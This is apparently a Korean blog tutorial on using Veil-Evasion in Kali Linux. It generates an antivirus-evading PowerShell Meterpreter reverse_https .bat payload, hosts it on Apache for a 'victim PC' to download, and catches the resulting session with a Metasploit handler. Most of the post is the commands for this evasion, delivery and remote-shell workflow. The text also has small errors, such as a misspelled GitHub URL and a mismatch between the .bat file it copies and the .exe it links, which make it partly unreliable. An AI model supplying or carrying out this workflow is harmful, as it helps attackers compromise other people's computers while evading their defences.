Veil-Evasion 설치 및 사용
feat.kail linux
Veil Evasion 설치
git를 아래 명령으로 설치 한다.
root@kali:~# apt-get -y install git |
Veil github link : https://github.com/veil-Framework/Veil
git 명령을 이용하여 Veil을 다운로드 한다.
root@kali:~# git clone https://githjub.com/Veil-Framework/Veil.git |
Veil 다운로드 후 파일중에 setup.sh 를 찾아 아래와 같이 실행 시켜준다. (setup.sh 위치는 버전마다 다를 수 있음)
root@kali:~/Veil/config# ./setup.sh -c |
Veil-Evasion 을 사용해 Payload 생성
.bat 확장자의 파일 생성 :
Windows PowerShell 사용하여 메모리에 Meteroreter stage & reverse_https 생성 메모리에 생성되면 Antivirus를 우회하고 인지될 가능성이 낮다.
.rc 확장의 Metasploit 설정 파일 생성 :
.bat 파일이 실행되고 Connection이 맺어지기까지 대기
아래의 명령으로 Veil을 실행 시킨다.
root@kali:~/Veil/config# ./Veil.py |
Veil 실행 화면 :
Availabel Tools 항목중 Evasion을 아래명령으로 선택한다.
Main menu choice: use 1 |
아래 명령으로 Payload Module 목록을 확인할 수 있다.
Main menu choice: list |
List available tools
아래 명령으로 사용할 Payload Module을 선택 하여 입력한다.
Veil-Evasion command : use powershell/meterpreter/rev_https.py |
내부 아이피를 set 한후 gernerate 명령으로 .bat 파일과 .rc 파일을 생성한다.
[powershell/meterpreter/rev_https>>] set LHOST xxx.xxx.xxx.xxx [powershell/meterpreter/rev_https>>] generate |
원하는 파일 이름을 입력한다.
Please enter the base name for output for output files (default is payload) : fileName |
아래와 같이 생성된 파일 경로와 Module 정보가 표시 된다.
Apache2 Server를 이용한 배포
아래 명령을 사용하여 아파치 서버를 동작시킨다.
root@kali:~# service apache2 start |
아래 명령으로 아파치 공유 폴더에 생성한 악성코드를 복사한다.
root@kali:~# cp /opt/veil/output/source/Veil.bat /var/www/html/ |
웹브라우저에서 호스트 PC 아이피 192.168.0.XXX/Veil.exe 를 입력하여 피해자 PC에서 악성코드를 다운받을 수 있다.
Metasploit 실행
Metasploit 실행 명령어는 아래와 같다.
root@kali:~# msfconsole |
Metasploit 실행 화면 :
아래의 명령으로 핸들러를 등록한다.
msf> resource /opt/veil/output/source/ |
피해자 PC에서 .bat 파일이 생성되면 session이 시작되면서 침투가 완료된다.
TCP idle Scan (0) | 2018.04.10 |
---|---|
Custom Payload feat shellter (0) | 2018.04.10 |
kali linux(feat.python) IP SCAN (0) | 2018.04.05 |
kali Linux 명령어 및 기초 (0) | 2018.04.04 |
Kali Linux 한글 설정 (0) | 2018.04.04 |